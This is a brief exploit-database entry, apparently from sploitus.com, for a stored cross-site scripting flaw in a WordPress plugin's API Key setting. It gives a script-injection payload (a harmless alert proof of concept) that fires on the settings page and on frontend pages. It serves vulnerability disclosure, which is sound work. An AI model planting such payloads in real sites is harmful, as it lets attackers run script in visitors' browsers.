## https://sploitus.com/exploit?id=WPEX-ID:99059337-C3CD-4E91-9A03-DF32A05B719C
Put the following payload in the API Key settings of the plugin: '></script><script>alert(/XSS/)</script>
The XSS will be triggered when viewing the settings again, as well as all frontend pages